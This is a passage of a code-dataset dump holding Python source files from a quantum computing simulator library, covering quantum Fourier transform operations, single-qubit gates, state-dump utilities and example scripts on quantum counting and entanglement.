"ce8a759c3c0ccd1d66661677eaece0b2c0ceb045", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9033, "license_type": "no_license", "max_line_length": 80, "num_lines": 269, "path": "/nyasQuantumCalculate/Operate/QFT.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nfrom .QubitsOperation import *\nfrom .Swap import *\nfrom .SingleQubitGate import *\nfrom .ControlMethod import *\nfrom nyasQuantumCalculate.Options import *\nfrom nyasQuantumCalculate.System import *\n\n\n__all__ = [\"QFT\", \"IQFT\", \"AQFT\", \"IAQFT\"]\n\n\ndef QFT_gate(qbs: Qubits) -> None:\n n = len(qbs)\n if n == 0:\n return\n if n == 1:\n H(qbs[0])\n return\n RotationGates.updateRs(n)\n for idx0, qb in enumerate(qbs):\n H(qb)\n for idx1, ctlQb in enumerate(qbs[idx0 + 1:]):\n Controlled(RotationGates.Rs[idx1 + 1], ctlQb.asQubits(), qb)\n if Options.QFTswap:\n for idx in range(n // 2):\n SWAP(qbs[idx], qbs[-(idx + 1)])\n\n\ndef iQFT_gate(qbs: Qubits) -> None:\n n = len(qbs)\n if n == 0:\n return\n if n == 1:\n H(qbs[0])\n return\n RotationGates.updateiRs(n)\n if Options.QFTswap:\n for idx in range(n // 2):\n SWAP(qbs[idx], qbs[-(idx + 1)])\n for idx0, qb in enumerate(qbs[::-1]):\n for idx1, ctlQb in enumerate(qbs[n - idx0:]):\n Controlled(RotationGates.iRs[idx1 + 1], ctlQb.asQubits(), qb)\n H(qb)\n\n\ndef QFT_numpy(qbs: Qubits) -> None:\n if len(qbs) == 0:\n return\n qbsys = qbs.system\n qbs_indexes = [qbsys.statesNdIndex(index) for index in qbs.indexes]\n indexesR = qbs_indexes + [index for index in range(qbsys.nQubits)\n if index not in qbs_indexes]\n indexes = list(range(qbsys.nQubits))\n for index0, index1 in enumerate(indexesR):\n indexes[index1] = index0\n controlling = (..., *([1] * qbsys.nControllingQubits))\n states = qbsys.statesNd. \\\n transpose(indexesR). \\\n reshape([-1] + [2] * (qbsys.nQubits - len(qbs))).copy()\n after: np.ndarray = 2 ** (len(qbs) / 2) * \\\n np.fft.ifft(states.__getitem__(controlling), axis=0)\n states.__setitem__(controlling, after)\n qbsys.statesNd *= 0.\n qbsys.statesNd += states.reshape([2] * qbsys.nQubits).transpose(indexes)\n if not Options.QFTswap:\n for idx in range(len(qbs) // 2):\n SWAP(qbs[idx], qbs[-(idx + 1)])\n\n\ndef iQFT_numpy(qbs: Qubits) -> None:\n if len(qbs) == 0:\n return\n if not Options.QFTswap:\n for idx in range(len(qbs) // 2):\n SWAP(qbs[idx], qbs[-(idx + 1)])\n qbsys = qbs.system\n qbs_indexes = [qbsys.statesNdIndex(index) for index in qbs.indexes]\n indexesR = qbs_indexes + [index for index in range(qbsys.nQubits)\n if index not in qbs_indexes]\n indexes = list(range(qbsys.nQubits))\n for index0, index1 in enumerate(indexesR):\n indexes[index1] = index0\n controlling = (..., *([1] * qbsys.nControllingQubits))\n states = qbsys.statesNd. \\\n transpose(indexesR). \\\n reshape([-1] + [2] * (qbsys.nQubits - len(qbs))).copy()\n after: np.ndarray = 2 ** (-len(qbs) / 2) * \\\n np.fft.fft(states.__getitem__(controlling), axis=0)\n states.__setitem__(controlling, after)\n qbsys.statesNd *= 0.\n qbsys.statesNd += states.reshape([2] * qbsys.nQubits).transpose(indexes)\n\n\nclass _QFT(QubitsOperation):\n \"\"\"量子傅里叶变换\n\n To use:\n >>> qbsys = QubitsSystem(2)\n >>> qbs = qbsys.getQubits()\n >>> ApplyToEach(X, qbs)\n >>> qbsys.states\n array([[0.+0.j],\n [0.+0.j],\n [0.+0.j],\n [1.+0.j]])\n >>> QFT(qbs)\n >>> qbsys.states\n array([[ 5.000000e-01+0.j ],\n [-5.000000e-01+0.j ],\n [-3.061617e-17-0.5j],\n [ 3.061617e-17+0.5j]])\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.name = \"QFT\"\n self.trackable = True\n self.controllable = True\n\n def call(self, qbs: Qubits) -> None:\n if Options.QFTwithNumpy:\n QFT_numpy(qbs)\n else:\n QFT_gate(qbs)\n\n def __call__(self, qbs: Qubits) -> None:\n if Options.inputCheck:\n if any(isControllingQubits(qbs)):\n raise ValueError(\"Controlled process operates controlling bit.\")\n if qbs.haveSameQubit():\n raise ValueError(\"QFT cannot operate multiple same qubits.\")\n sysStopTrack = qbs.system.stopTracking\n if qbs.system.canTrack() and self.trackable:\n qbs.system.addTrack(self.name, *qbs.indexes)\n qbs.system.stopTracking = True\n self.call(qbs)\n if not sysStopTrack:\n qbs.system.stopTracking = False\n\n\nclass _iQFT(QubitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"iQFT\"\n self.trackable = True\n self.controllable = True\n\n def call(self, qbs: Qubits) -> None:\n if Options.QFTwithNumpy:\n iQFT_numpy(qbs)\n else:\n iQFT_gate(qbs)\n\n def __call__(self, qbs: Qubits) -> None:\n if Options.inputCheck:\n if any(isControllingQubits(qbs)):\n raise ValueError(\"Controlled process operates controlling bit.\")\n if qbs.haveSameQubit():\n raise ValueError(\"QFT cannot operate multiple same qubits.\")\n sysStopTrack = qbs.system.stopTracking\n if qbs.system.canTrack() and self.trackable:\n qbs.system.addTrack(self.name, *qbs.indexes)\n qbs.system.stopTracking = True\n self.call(qbs)\n if not sysStopTrack:\n qbs.system.stopTracking = False\n\n\nclass _AQFT(QubitsOperation):\n \"\"\"近似量子傅里叶变换\n\n 比起QFT, AQFT在存在退相干时精度更高, 并且需要的位门更少. 输入m(int)\n 是控制AQFT精度的参数, m只能大于0小于等于输入qbs的长度. 当\n m=1时, 即是Hadamard变换, m=输入qbs长度即为QFT.\n\n 注意: AQFT是由位门实现的, 而在这里QFT提供numpy实现, 在很多量子位\n 的情况下numpy实现的QFT比位门实现的AQFT要快很多倍.\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.name = \"AQFT\"\n self.trackable = True\n self.controllable = True\n\n def call(self, qbs: Qubits, m: int) -> None:\n n = len(qbs)\n if n == 0:\n return\n if n == 1:\n H(qbs[0])\n return\n RotationGates.updateRs(n)\n for idx0, qb in enumerate(qbs):\n H(qb)\n for idx1, ctl in enumerate(qbs[idx0 + 1: min(idx0 + m, len(qbs))]):\n Controlled(RotationGates.Rs[idx1 + 1], ctl.asQubits(), qb)\n if Options.QFTswap:\n for idx in range(len(qbs) // 2):\n SWAP(qbs[idx], qbs[-(idx + 1)])\n\n def __call__(self, qbs: Qubits, m: int) -> None:\n if Options.inputCheck:\n if m <= 0 or m > len(qbs):\n raise ValueError(\"'m' should be greater than 0 and \"\n \"lower or equal to len(qbs)\")\n if any(isControllingQubits(qbs)):\n raise ValueError(\"Controlled process operates controlling bit.\")\n if qbs.haveSameQubit():\n raise ValueError(\"QFT cannot operate multiple same qubits.\")\n sysStopTrack = qbs.system.stopTracking\n if qbs.system.canTrack() and self.trackable:\n qbs.system.addTrack(self.name + f\"_{m}\", *qbs.indexes)\n qbs.system.stopTracking = True\n self.call(qbs, m)\n if not sysStopTrack:\n qbs.system.stopTracking = False\n\n\nclass _iAQFT(QubitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"iAQFT\"\n self.trackable = True\n self.controllable = True\n\n def call(self, qbs: Qubits, m: int) -> None:\n n = len(qbs)\n if n == 0:\n return\n if n == 1:\n H(qbs[0])\n return\n RotationGates.updateiRs(n)\n for idx0, qb in enumerate(qbs):\n H(qb)\n for idx1, ctl in enumerate(qbs[idx0 + 1: min(idx0 + m, len(qbs))]):\n Controlled(RotationGates.iRs[idx1 + 1], ctl.asQubits(), qb)\n if Options.QFTswap:\n for idx in range(len(qbs) // 2):\n SWAP(qbs[idx], qbs[-(idx + 1)])\n\n def __call__(self, qbs: Qubits, m: int) -> None:\n if Options.inputCheck:\n if m <= 0 or m > len(qbs):\n raise ValueError(\"'m' should be greater than 0 and \"\n \"lower or equal to len(qbs)\")\n if any(isControllingQubits(qbs)):\n raise ValueError(\"Controlled process operates controlling bit.\")\n if qbs.haveSameQubit():\n raise ValueError(\"QFT cannot operate multiple same qubits.\")\n sysStopTrack = qbs.system.stopTracking\n if qbs.system.canTrack() and self.trackable:\n qbs.system.addTrack(self.name + f\"_{m}\", *qbs.indexes)\n qbs.system.stopTracking = True\n self.call(qbs, m)\n if not sysStopTrack:\n qbs.system.stopTracking = False\n\n\nQFT = _QFT()\nIQFT = _iQFT()\n\nAQFT = _AQFT()\nIAQFT = _iAQFT()\n" }, { "alpha_fraction": 0.5031394362449646, "alphanum_fraction": 0.5237531065940857, "avg_line_length": 32.3636360168457, "blob_id": "8eb27908573b3e67ecbb56f37d854d0e77fa3b30", "content_id": "7732fa8c884557db3d86f038e41d09018465ec0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8887, "license_type": "no_license", "max_line_length": 79, "num_lines": 253, "path": "/nyasQuantumCalculate/Operate/SingleQubitGate.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import Any, List\n\nimport numpy as np\n\nfrom .QubitsOperation import *\nfrom nyasQuantumCalculate.Options import *\nfrom nyasQuantumCalculate.Utils import *\nfrom nyasQuantumCalculate.System import *\n\n\n__all__ = [\"SingleQubitGate\", \"Rx\", \"Ry\", \"Rz\", \"R1\", \"Phase\", \"RotationGates\",\n \"I\", \"H\", \"X\", \"Y\", \"Z\", \"S\", \"T\", \"SR\", \"TR\"]\n\n\nclass SingleQubitGate(QubitsOperation):\n \"\"\"SingleQubitGate(complex, complex, complex, complex, str, **)\n\n 单量子位门必须是酉矩阵, 初始化前可以使用`SingleQubitGate.checkUnitGate`\n 检查4个数字是否组成单量子位门. 输入参数`name`可以定义门的名字以方便跟踪. 并且\n 被作用单量子位门的量子位不能是控制位.\n\n Attributes:\n matrix: 单量子位门里的矩阵\n \"\"\"\n\n def __init__(self,\n a: complex, b: complex,\n c: complex, d: complex,\n name: str = \"\",\n **kwargs: Any) -> None:\n if not kwargs.get(\"_notCheck\", False) and \\\n not self.checkUnitGate(a, b, c, d):\n raise ValueError(\"Input parameters cannot build a qubit gate.\")\n super().__init__()\n self.name = name\n self.controllable = True\n self.trackable = True\n self._isBuiltin = kwargs.get(\"_isBuiltin\", False)\n self.matrix = np.array(((a, b), (c, d)), np.complex128)\n\n def copy(self) -> \"SingleQubitGate\":\n new = SingleQubitGate(0., 0., 0., 0., _notCheck=True)\n new.name = self.name\n new.controllable = self.controllable\n self.trackable = self.trackable\n new.matrix = self.matrix.copy()\n return new\n\n @staticmethod\n def checkUnitGate(a: complex, b: complex, c: complex, d: complex) -> bool:\n \"\"\"检查参数是否可以组成单量子位门\n\n Args:\n a: 矩阵里左上元素\n b: 矩阵里右上元素\n c: 矩阵里左下元素\n d: 矩阵里右下元素\n\n Returns:\n True为可以组成单量子位门\"\"\"\n absA = np.square(np.abs(a))\n absB = np.square(np.abs(b))\n absC = np.square(np.abs(c))\n absD = np.square(np.abs(d))\n return equal0(np.abs(a * np.conj(c) + b * np.conj(d))) and \\\n equal0(np.abs(a * np.conj(b) + c * np.conj(d))) and \\\n equal0(absA + absB - 1.) and equal0(absA + absC - 1.) and \\\n equal0(absD + absB - 1.) and equal0(absD + absC - 1.)\n\n def __str__(self) -> str:\n return f\"{self.name} Gate\"\n\n def __repr__(self) -> str:\n (a, b), (c, d) = self.matrix\n return f\"{self.name}[{a:.2f} {b:.2f}; {c:.2f} {d:.2f}]\"\n\n def call(self, qb: Qubit) -> None:\n qbsys = qb.system\n m = self.matrix\n controlling0 = (0, ..., *([1] * qbsys.nControllingQubits))\n controlling1 = (1, ..., *([1] * qbsys.nControllingQubits))\n states = qbsys.statesNd.swapaxes(0, qbsys.statesNdIndex(qb.index))\n new0 = states.__getitem__(controlling0).copy()\n if m[0, 1] == 0.:\n new0 *= m[0, 0]\n else:\n new0 *= m[0, 0] / m[0, 1]\n new0 += states.__getitem__(controlling1)\n new0 *= m[0, 1]\n new1 = states.__getitem__(controlling0).copy()\n if m[1, 1] == 0.:\n new1 *= m[1, 0]\n else:\n new1 *= m[1, 0] / m[1, 1]\n new1 += states.__getitem__(controlling1)\n new1 *= m[1, 1]\n states.__setitem__(controlling0, new0)\n states.__setitem__(controlling1, new1)\n if Options.autoNormalize:\n qbsys.normalize()\n\n def __call__(self, qb: Qubit) -> None:\n qbsys = qb.system\n if Options.inputCheck and qbsys.isControlling(qb.index):\n raise ValueError(\"受控过程作用在控制位上\")\n sysStopTrack = qbsys.stopTracking\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(self.name, qb.index)\n qbsys.stopTracking = True\n self.call(qb)\n if not sysStopTrack:\n qbsys.stopTracking = False\n\n def __imul__(self, s: complex) -> \"SingleQubitGate\":\n if self._isBuiltin:\n raise NotImplementedError(\"The built-in gate cannot be modified.\")\n if not equal0(np.abs(s) - 1.):\n raise ValueError(\"The norm of the scalar multiplication\"\n \" must equal to 1.\")\n self.matrix *= s\n return self\n\n def __mul__(self, s: complex) -> \"SingleQubitGate\":\n new = SingleQubitGate(0., 0., 0., 0., _notCheck=True)\n new.matrix = self.matrix.copy()\n return new.__imul__(s)\n\n def __rmul__(self, s: complex) -> \"SingleQubitGate\":\n return self.__mul__(s)\n\n def __matmul__(self, right: \"SingleQubitGate\") -> \"SingleQubitGate\":\n new = SingleQubitGate(0., 0., 0., 0., _notCheck=True)\n new.matrix = self.matrix @ right.matrix\n return new\n\n def __ipow__(self, n: complex) -> \"SingleQubitGate\":\n if self._isBuiltin:\n raise NotImplementedError(\"The built-in gate cannot be modified.\")\n v, Q = np.linalg.eig(self.matrix)\n self.matrix *= 0\n self.matrix += Q @ np.diag(v ** n) @ np.linalg.inv(Q)\n return self\n\n def __pow__(self, n: complex) -> \"SingleQubitGate\":\n new = SingleQubitGate(0., 0., 0., 0., _notCheck=True)\n new.matrix = self.matrix.copy()\n return new.__ipow__(n)\n\n\n###############################################################################\n############################ Built-in Gates #################################\n###############################################################################\nrsqrt2 = 1. / np.sqrt(2.)\n\n\nI = SingleQubitGate(1., 0., 0., 1.,\n _notCheck=True, _isBuiltin=True, name='I')\nI.trackable = False\n\nH = SingleQubitGate(rsqrt2, rsqrt2, rsqrt2, -rsqrt2,\n _notCheck=True, _isBuiltin=True, name='H')\n\nX = SingleQubitGate(0., 1., 1., 0.,\n _notCheck=True, _isBuiltin=True, name='X')\n\nY = SingleQubitGate(0., -1.j, 1.j, 0.,\n _notCheck=True, _isBuiltin=True, name='Y')\n\nZ = SingleQubitGate(1., 0., 0., -1.,\n _notCheck=True, _isBuiltin=True, name='Z')\n\nS = SingleQubitGate(1., 0., 0., 1.j,\n _notCheck=True, _isBuiltin=True, name='S')\n\nSR = SingleQubitGate(1., 0., 0., -1.j,\n _notCheck=True, _isBuiltin=True, name='S^-1')\n\nT = SingleQubitGate(1., 0., 0., rsqrt2 + 1j*rsqrt2,\n _notCheck=True, _isBuiltin=True, name='T')\n\nTR = SingleQubitGate(1., 0., 0., rsqrt2 - 1j*rsqrt2,\n _notCheck=True, _isBuiltin=True, name='T^-1')\n\n\ndef Rx(theta: float) -> SingleQubitGate:\n a = np.cos(theta / 2.)\n b = -1j * np.sin(theta / 2.)\n return SingleQubitGate(a, b, b, a,\n _notCheck=True, name=f\"Rx({theta:.4f})\")\n\n\ndef Ry(theta: float) -> SingleQubitGate:\n a = np.cos(theta / 2.)\n b = np.sin(theta / 2.)\n return SingleQubitGate(a, -b, b, a,\n _notCheck=True, name=f\"Ry({theta:.4f})\")\n\n\ndef Rz(theta: float) -> SingleQubitGate:\n a = np.cos(theta / 2.)\n b = 1j * np.sin(theta / 2.)\n return SingleQubitGate(a - b, 0., 0., a + b,\n _notCheck=True, name=f\"Rz({theta:.4f})\")\n\n\ndef R1(theta: float) -> SingleQubitGate:\n \"\"\"|1❭相位旋转门, 实际上 R1(theta) = Phase(theta/2) @ Rz(theta)\"\"\"\n return SingleQubitGate(1., 0., 0., np.exp(1j * theta),\n _notCheck=True, name=f\"R1({theta:.4f})\")\n\n\ndef Phase(theta: float) -> SingleQubitGate:\n ph = np.exp(1j * theta)\n return SingleQubitGate(ph, 0., 0., ph,\n _notCheck=True, name=f\"Ph({theta:.4f})\")\n\n\nclass RotationGates:\n \"\"\"RotationGates(x)\n\n 这个类不应该被初始化.\n\n 用于管理QFT和Add等地方使用的旋转门, 通过`Rs`和`iRs`的索引可以获取相应的门. 比如\n `RotationGates.Rs[4]` 可以获取 `R1(2*pi/2**4)` 而`iRs`是`Rs`的逆门. 记得\n 在索引前使用`RotationGates.updateRs(int)`来确保门已被初始化.\n \"\"\"\n Rs: List[SingleQubitGate] = list()\n iRs: List[SingleQubitGate] = list()\n\n @ staticmethod\n def R(n: int) -> SingleQubitGate:\n gate = R1(pi / (1 << (n - 1)))\n gate.name = f\"R_{n}\"\n return gate\n\n @staticmethod\n def iR(n: int) -> SingleQubitGate:\n \"\"\"iQFT里的相位门\"\"\"\n gate = R1(-pi / (1 << (n - 1)))\n gate.name = f\"iR_{n}\"\n return gate\n\n @classmethod\n def updateRs(cls, n: int) -> None:\n if n > len(cls.Rs):\n cls.Rs += [cls.R(i) for i in range(len(cls.Rs) + 1, n + 1)]\n\n @ classmethod\n def updateiRs(cls, n: int) -> None:\n if n > len(cls.iRs):\n cls.iRs += [cls.iR(i) for i in range(len(cls.iRs) + 1, n + 1)]\n" }, { "alpha_fraction": 0.5902021527290344, "alphanum_fraction": 0.5964230298995972, "avg_line_length": 27.577777862548828, "blob_id": "b0ca89bf35539138d080d0f32e02d11513425c77", "content_id": "4f494c761c1c984dcfaedf8112b0176cf5edf033", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1378, "license_type": "no_license", "max_line_length": 77, "num_lines": 45, "path": "/nyasQuantumCalculate/System/__init__.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import Union as _U, List as _L\n\nfrom .Dump import *\nfrom .Qubits import *\nfrom .Qubit import *\nfrom .QubitsSystem import *\n\n\ndef inSameSystem(*args: _U[Qubit, Qubits, QubitsSystem]) -> bool:\n \"\"\"检查输入是否处于同一个量子位系统内\"\"\"\n ele0 = args[0]\n id = (ele0 if isinstance(ele0, QubitsSystem) else ele0.system).id\n for ele in args[1:]:\n if (ele if isinstance(ele, QubitsSystem) else ele.system).id != id:\n return False\n return True\n\n\ndef isControllingQubits(*args: _U[Qubit, Qubits]) -> _L[bool]:\n \"\"\"检查输入量子位是否为控制位 (这个方法不会检查是否为同一个系统)\"\"\"\n res: _L[bool] = list()\n qbsys = args[0].system\n for ele in args:\n if isinstance(ele, Qubit):\n res.append(qbsys.isControlling(ele.index))\n continue\n res += [qbsys.isControlling(index) for index in ele.indexes]\n return res\n\n\ndef haveSameQubit(*args: _U[Qubit, Qubits]) -> bool:\n tmp: _L[int] = list()\n for ele in args:\n if isinstance(ele, Qubit):\n index = ele.index\n if index in tmp:\n return True\n tmp.append(index)\n continue\n if any(index in tmp for index in ele.indexes) or ele.haveSameQubit():\n return True\n tmp += ele.indexes\n return False\n" }, { "alpha_fraction": 0.5678327679634094, "alphanum_fraction": 0.592576801776886, "avg_line_length": 30.675676345825195, "blob_id": "d1862eeef120bfa7a861b4fbc8ae021c5d58bc6f", "content_id": "226157534b3158e789c1d91678dc4d612b1fa155", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2454, "license_type": "no_license", "max_line_length": 79, "num_lines": 74, "path": "/nyasQuantumCalculate/System/Dump.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nfrom nyasQuantumCalculate.Utils import *\nfrom .QubitsSystem import *\n\nhave_matplotlib: bool = True\ntry:\n from matplotlib import pyplot as plt\nexcept ModuleNotFoundError:\n have_matplotlib = False\n\n\n__all__ = [\"DumpSystemText\", \"DumpSystemFig\", \"have_matplotlib\"]\n\n\nlog10_2: float = np.log10(2.)\n\n\ndef DumpSystemText(qbsys: QubitsSystem) -> None:\n \"\"\"以字符串形式打印系统所有状态\n\n Args:\n sys: 需要查看的系统\"\"\"\n print(f\"# states in {qbsys.nQubits} qubits system\")\n index_length = 1 + int(qbsys.nQubits * log10_2)\n format_str = '{' + f\":0{index_length}\" + '}'\n length = 21 - index_length\n for index, state in enumerate(qbsys.states[:, 0]):\n prob = np.square(np.abs(state))\n angle = np.angle(state)\n bar_length = int((prob + 1e-8) * length)\n print('∣' + format_str.format(index) + '❭', end=\" \")\n Simag = np.abs(state.imag)\n if state.imag >= 0.:\n print(f\"[{state.real: .4f} + {Simag:.4f}i]\", end=\" \")\n else:\n print(f\"[{state.real: .4f} - {Simag:.4f}i]\", end=\" \")\n print(f\"| {'='*bar_length}{' '*(length-bar_length)} |\", end=\" \")\n print(f\"[prob: {prob:.4f}] [rad:{angle: .4f}]\")\n print()\n\n\ndef DumpSystemFig(qbsys: QubitsSystem, block: bool = True) -> None:\n \"\"\"以字符串形式打印系统所有状态\n\n 使用前请确保已安装 matplotlib\n\n Args:\n sys: 需要查看的系统\"\"\"\n if not have_matplotlib:\n raise ModuleNotFoundError(\"No module named 'matplotlib'\")\n states = qbsys.states[:, 0]\n prob = np.square(np.abs(states))\n angle = np.angle(states)\n index_length = 1 + int(qbsys.nQubits * log10_2)\n format_str = \"∣{\" + f\":0{index_length}\" + \"}❭\"\n lable_range = range(0, len(states), max(len(states) >> 5, 1))\n lables = [format_str.format(i) for i in lable_range]\n color = [\"#{:02X}{:02X}{:02x}\".format(*ColorWheel2RGB(theta))\n for theta in angle]\n lw = 0.75 if len(states) < 128 else 0.0\n plt.clf()\n plt.xticks(lable_range, lables, size=6,\n rotation=\"vertical\", fontfamily=\"monospace\")\n plt.ylim(0., 1.1)\n plt.ylabel(\"Probability\")\n plt.bar(range(len(states)), prob, color=color, ec=\"#000000\", ls='-', lw=lw)\n plt.show(block=block)\n\n\n# TODO def DumpRegisterText(qbs: Qubits) -> None:\n# TODO def DumpRegisterFig(qbs: Qubits, block: bool = True) -> None:\n" }, { "alpha_fraction": 0.5653342008590698, "alphanum_fraction": 0.5918710231781006, "avg_line_length": 29.37755012512207, "blob_id": "38041e61276e29c797f4c746e09aa33e8201f716", "content_id": "0bc8612dbfb67010bed7b146bee02634861780fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3405, "license_type": "no_license", "max_line_length": 79, "num_lines": 98, "path": "/examples/7-QuantumCounting.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nfrom nyasQuantumCalculate import *\nfrom numpy import pi, sin\n\n\nOptions.autoNormalize = False\n\n\"\"\"细节可以参考 https://www.bilibili.com/read/cv11088535\"\"\"\n\n\n###############################################################################\n\"\"\" 图形着色部分代码 \"\"\"\nedges = [(0, 1), (0, 2), (0, 3), (1, 2), (1, 3), (2, 3)]\nnColorBits = 2\nnVertex = max(max(edge) for edge in edges) + 1\ndef Equality(registerA: Qubits, registerB: Qubits, target: Qubit) -> None:\n # 把registerA和registerB按位做XOR, 结果储存在registerB\n for q0, q1 in zip(registerA, registerB):\n Builtin.CNOT(q0, q1)\n # registerB按位取反\n ApplyToEach(Builtin.X, registerB)\n # 如果registerB全部为1, 说明registerA=registerB, 则翻转target的状态\n Controlled(Builtin.X, registerB, target)\n # 反向计算所有改变registerB的逻辑以还原registerB\n ApplyToEach(Builtin.X, registerB)\n for q0, q1 in zip(registerA, registerB):\n Builtin.CNOT(q0, q1)\ndef GraphColoring(register: Qubits, target: Qubit) -> None:\n colors = [register[2*i:2*i+2] for i in range(5)]\n with TemporaryQubits(register.system, len(edges)) as tmpQubits:\n for (i0, i1), tmpQ in zip(edges, tmpQubits):\n Equality(colors[i0], colors[i1], tmpQ)\n ApplyToEach(Builtin.X, tmpQubits)\n Controlled(Builtin.X, tmpQubits, target)\n # 退出前还原tmpQubits\n ApplyToEach(Builtin.X, tmpQubits)\n for (i0, i1), tmpQ in zip(edges, tmpQubits):\n Equality(colors[i0], colors[i1], tmpQ)\n\n\n###############################################################################\n\n\ndef GroverOperator(register: Qubits) -> None:\n ApplyToEach(Builtin.H, register)\n ApplyToEach(Builtin.X, register)\n Controlled(Builtin.Z, register[:-1], register[-1])\n ApplyToEach(Builtin.X, register)\n ApplyToEach(Builtin.H, register)\n #Phase(pi)(register[-1])\n\n # 如果增加 `Phase(pi)(register[-1])` 的代码, Grover算子定义为\n # G = W(2|0❭❬0|-I)W, 这时从测量结果得到M的式子为 2**n*sin(pi*2*phi)**2.\n # 当如果没有这行代码, Grover算子定义为 G = W(I-2|0❭❬0|)W, 这时\n # 计算M为 2**n*sin(pi*(2*phi-0.5))**2\n\n\nn = nVertex * nColorBits # 运行Grover算法的量子位数量\nm = n + 2 # 运行相位估计的精度\n\nqbsys = QubitsSystem(1 + n)\nA = qbsys[0] # 使用化简的相位估计, 只需要1个量子位而不是m个\nB = qbsys[1:] # Grover算法的量子位\n\n# 制备特征叠加态\nApplyToEach(Builtin.H, B)\n# 把Grover算法里单次迭代做成一个函数\ndef RunGroverStep():\n with TemporaryQubit(qbsys) as tmp:\n # 使用相位反冲技巧把标记黑盒转为相位黑盒\n Builtin.X(tmp)\n Builtin.H(tmp)\n GraphColoring(B, tmp)\n Builtin.H(tmp)\n Builtin.X(tmp)\n GroverOperator(B)\n\n\n# 相位估计算法\nphi = 0.\nfor i in range(m):\n Builtin.H(A)\n for _ in range(2 ** (m - i - 1)):\n Controlled(RunGroverStep, A.asQubits())\n R1(-2 * pi * phi)(A)\n Builtin.H(A)\n res = Builtin.M(A)\n if res:\n Builtin.X(A)\n phi = phi / 2 + int(res) / 4\n\n# 输出, 重置系统\nprint(\"测得共有\", round(2**n * sin(pi*(2*phi-0.5))**2), \"个正确答案\")\nBuiltin.RA(qbsys[:])\n" }, { "alpha_fraction": 0.6716312170028687, "alphanum_fraction": 0.7021276354789734, "avg_line_length": 17.799999237060547, "blob_id": "27925144606713d278a7d362cef10f68ca3be6ec", "content_id": "795b2995c4258f64905999897cbea6b3749ee963", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2302, "license_type": "no_license", "max_line_length": 59, "num_lines": 75, "path": "/examples/1-InterferenceAndEntanglement.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nfrom nyasQuantumCalculate import *\n\n\n\n############# 干涉 Interference\n\n# 量子具有波动性, 也就是像水波一样在\"波峰-波峰\"和\"波谷-波谷\"的地方会增长\n# 而在\"波谷-波峰\"的地方会消减\n\n# 制备一个同时具有∣0❭和∣1❭的量子位, 并且相位相同\nsytm = QubitsSystem(1)\nq = sytm[0]\n\nBuiltin.H(q)\nDumpSystemText(q.system)\n\n# 把量子通过\"双缝\", 在∣0❭处相位相同, 产生了增长, 而在∣1❭处相位相异, 产生了消减\nBuiltin.H(q)\nDumpSystemText(q.system)\n# 尽管这里可以解释为H门的逆为自身, 使用会产生H门后再H门会得到原来的状态\n# 不过把H门看作双缝不是挺优美的吗 (bushi\nBuiltin.R(q) # 做完一次实验就Reset量子系统是良好的习惯\n\n# 这次来制备与上面情况差不多的量子位, 但∣1❭的相位相差了pi (-1 = e^(i*pi))\nBuiltin.H(q)\nBuiltin.Z(q)\nDumpSystemText(q.system)\n\n# 这时候再通过\"双缝\", 可以看到因为相位的偏差, 这里∣0❭产生消减∣1❭产生增长\nBuiltin.H(q)\nDumpSystemText(q.system)\n\n# 清除多余的对象\nBuiltin.RA(sytm.getQubits())\nq = None\nsytm = None\n# python把对象设置为None可以清除对象\n# *前提是对象在其他地方没有引用\n\n\n\n################# 纠缠 Entanglement\n\n# 在量子力学里纠缠意味着两个或以上个粒子的状态互相绑定在一起\n# 在测量其中一个粒子时, 另外的粒子状态也会坍缩到特定状态\n\n# 先来制备具有纠缠态的两个量子位的系统\nsytm = QubitsSystem(2)\nq0 = sytm[0]\nq1 = sytm[1]\n\nBuiltin.H(q0)\nBuiltin.CNOT(q0, q1)\nDumpSystemText(q0.system)\n\n# ∣0❭ (∣00❭) 是两个量子位都为0的状态\n# ∣1❭ (∣01❭) 是第二个量子位为0, 第一个量子位为1的状态, 以此类推\n\n# 看到系统只在∣0❭和∣3❭有分布, 而在∣1❭和∣2❭没有分布\n# 可以推测当第一个粒子测量为0时, 第二个粒子必定为0, 对于结果1也类似\nprint(f\"Measure Qubit-0: {Builtin.M(q0)}\")\nDumpSystemText(q0.system)\nprint(f\"Measure Qubit-1: {Builtin.M(q1)}\")\n\nBuiltin.RA(sytm.getQubits())\n# 可以把这里的代码重复运行多几次试试看\n\nq0 = None\nq1 = None\nsytm = None\n" }, { "alpha_fraction": 0.5331347584724426, "alphanum_fraction": 0.5599404573440552, "avg_line_length": 22.15517234802246, "blob_id": "91d2f77753ba4e0724684e1e842df5758087578a", "content_id": "092fb888e91556f01d006994aeab5002e0e8aab3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1872, "license_type": "no_license", "max_line_length": 79, "num_lines": 58, "path": "/examples/6-PhaseEstimation.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", 